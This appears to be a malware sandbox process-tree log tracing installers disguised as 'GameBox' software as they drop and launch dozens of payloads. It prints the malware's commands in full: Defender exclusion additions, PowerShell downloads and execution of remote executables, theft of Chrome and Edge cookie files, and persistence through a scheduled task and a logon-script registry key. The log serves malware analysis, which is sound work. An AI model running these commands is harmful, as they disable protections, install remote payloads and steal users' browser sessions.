C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6BSUU.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-6BSUU.tmp\MediaBurner2.tmp" /SL5="$10316,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D6THF.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-D6THF.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
-
C:\Program Files\7-Zip\VGSTDTTTRI\ultramediaburner.exe"C:\Program Files\7-Zip\VGSTDTTTRI\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8K0LK.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-8K0LK.tmp\ultramediaburner.tmp" /SL5="$10580,281924,62464,C:\Program Files\7-Zip\VGSTDTTTRI\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a0-1ca50-a28-217a0-e26b434a4d500\Risaebiwaga.exe"C:\Users\Admin\AppData\Local\Temp\a0-1ca50-a28-217a0-e26b434a4d500\Risaebiwaga.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fa-f7d42-4ca-3739d-71c1c1e0cf06c\Baezhizhybaeja.exe"C:\Users\Admin\AppData\Local\Temp\fa-f7d42-4ca-3739d-71c1c1e0cf06c\Baezhizhybaeja.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\escqathd.pcg\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\escqathd.pcg\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\escqathd.pcg\GcleanerEU.exe /eufive10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2juymkst.m0u\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2juymkst.m0u\installer.exeC:\Users\Admin\AppData\Local\Temp\2juymkst.m0u\installer.exe /qn CAMPAIGN="654"10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o5fwrc5r.w2z\ufgaa.exe & exit9⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exeC:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe"C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe" -q11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nocpi0lo.b2d\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\nocpi0lo.b2d\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\nocpi0lo.b2d\gcleaner.exe /mixfive10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jealh0ei.15t\autosubplayer.exe /S & exit9⤵
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
-
C:\Users\Admin\Documents\XSfwuWpNE2V1rz6j_m2Fy57r.exe"C:\Users\Admin\Documents\XSfwuWpNE2V1rz6j_m2Fy57r.exe"6⤵
-
-
C:\Users\Admin\Documents\z6bB2x5nAcREXc8NvL2R0HNc.exe"C:\Users\Admin\Documents\z6bB2x5nAcREXc8NvL2R0HNc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 6607⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\TnmOFgOaqtpeIJKlBhhq7hD3.exe"C:\Users\Admin\Documents\TnmOFgOaqtpeIJKlBhhq7hD3.exe"6⤵
-
-
C:\Users\Admin\Documents\rViLFJ1s02xNtBgNh6z_AhgM.exe"C:\Users\Admin\Documents\rViLFJ1s02xNtBgNh6z_AhgM.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-L0H25.tmp\rViLFJ1s02xNtBgNh6z_AhgM.tmp"C:\Users\Admin\AppData\Local\Temp\is-L0H25.tmp\rViLFJ1s02xNtBgNh6z_AhgM.tmp" /SL5="$80030,138429,56832,C:\Users\Admin\Documents\rViLFJ1s02xNtBgNh6z_AhgM.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-79R73.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-79R73.tmp\Setup.exe" /Verysilent8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282281 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
-
-
-
-
-
-
C:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exe"C:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exe"6⤵
-
C:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exeC:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exe7⤵
-
-
-
C:\Users\Admin\Documents\dpWiXuhH9ho38OzbMT0bEQ2c.exe"C:\Users\Admin\Documents\dpWiXuhH9ho38OzbMT0bEQ2c.exe"6⤵
-
-
C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe"C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe"6⤵
-
C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe"C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe"7⤵
-
-
-
C:\Users\Admin\Documents\ASJK5ES2koO5yAPesHmPVN8p.exe"C:\Users\Admin\Documents\ASJK5ES2koO5yAPesHmPVN8p.exe"6⤵
-
-
C:\Users\Admin\Documents\boQfT5w04ssp2iAhPWEWTW1_.exe"C:\Users\Admin\Documents\boQfT5w04ssp2iAhPWEWTW1_.exe"6⤵
-
-
C:\Users\Admin\Documents\8OQJIFlE3xQYcN05XKpLy6b6.exe"C:\Users\Admin\Documents\8OQJIFlE3xQYcN05XKpLy6b6.exe"6⤵
-
-
C:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exe"C:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exe"6⤵
-
C:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exeC:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exe7⤵
-
-
-
C:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exe"C:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exe"6⤵
-
C:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exeC:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exe7⤵
-
-
-
C:\Users\Admin\Documents\6ginCTnXhtz4p18vyaLqxgvv.exe"C:\Users\Admin\Documents\6ginCTnXhtz4p18vyaLqxgvv.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2469099.exe"C:\Users\Admin\AppData\Roaming\2469099.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\6010765.exe"C:\Users\Admin\AppData\Roaming\6010765.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\3053378.exe"C:\Users\Admin\AppData\Roaming\3053378.exe"7⤵
-
-
-
C:\Users\Admin\Documents\3LnGmlSQ6XFEyjFB3TYQ8Vev.exe"C:\Users\Admin\Documents\3LnGmlSQ6XFEyjFB3TYQ8Vev.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'8⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'11⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'11⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'11⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit12⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'13⤵
- Creates scheduled task(s)
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'8⤵
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"9⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'8⤵
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"{path}"10⤵
-
-
-
-
-
-
C:\Users\Admin\Documents\6XReqGdcnRN2oC125ZEp85FG.exe"C:\Users\Admin\Documents\6XReqGdcnRN2oC125ZEp85FG.exe"6⤵
-
-
C:\Users\Admin\Documents\j7kbQ5ncTn6vVvrA5jjuM1W_.exe"C:\Users\Admin\Documents\j7kbQ5ncTn6vVvrA5jjuM1W_.exe"6⤵
-
-
C:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exe"C:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exe"6⤵
-
C:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exeC:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exe7⤵
-
-
-
C:\Users\Admin\Documents\ZT1jvruAWBISOrPsPZ3RT28y.exe"C:\Users\Admin\Documents\ZT1jvruAWBISOrPsPZ3RT28y.exe"6⤵
-
-
C:\Users\Admin\Documents\jZP7ZZTMmPBSXKB5D2lvCPez.exe"C:\Users\Admin\Documents\jZP7ZZTMmPBSXKB5D2lvCPez.exe"6⤵
-
-
C:\Users\Admin\Documents\vqkDfCSnO2vCSl9aj1G376Nn.exe"C:\Users\Admin\Documents\vqkDfCSnO2vCSl9aj1G376Nn.exe"6⤵
-
-
C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe"C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe"6⤵
-
C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe"C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe" -q7⤵
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp6722_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp6722_tmp.exe"6⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping RJMQBVDN -n 309⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\8104798.exe"C:\Users\Admin\AppData\Roaming\8104798.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\5095205.exe"C:\Users\Admin\AppData\Roaming\5095205.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\7660298.exe"C:\Users\Admin\AppData\Roaming\7660298.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\4510927.exe"C:\Users\Admin\AppData\Roaming\4510927.exe"6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-N7KIN.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-N7KIN.tmp\Inlog.tmp" /SL5="$102C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T2GT0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-T2GT0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7212⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JOG8H.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JOG8H.tmp\Setup.tmp" /SL5="$604DA,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-T2GT0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7213⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\microsoft.cab -F:* %ProgramData%4⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\microsoft.cab -F:* C:\ProgramData5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f5⤵
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\vdi_compiler"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\vdi_compiler.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 46⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7214⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A36BB2745CC5C77D28F2E8B3EA6B0087 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5AAF63B790A49186C29283D582D68548 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F6D5F4C5C90C9F0ED68735C911ACFB512⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 59A76B1055D4E684011DB0EC106D3675 C2⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffc0023dec0,0x7ffc0023ded0,0x7ffc0023dee05⤵
-
-
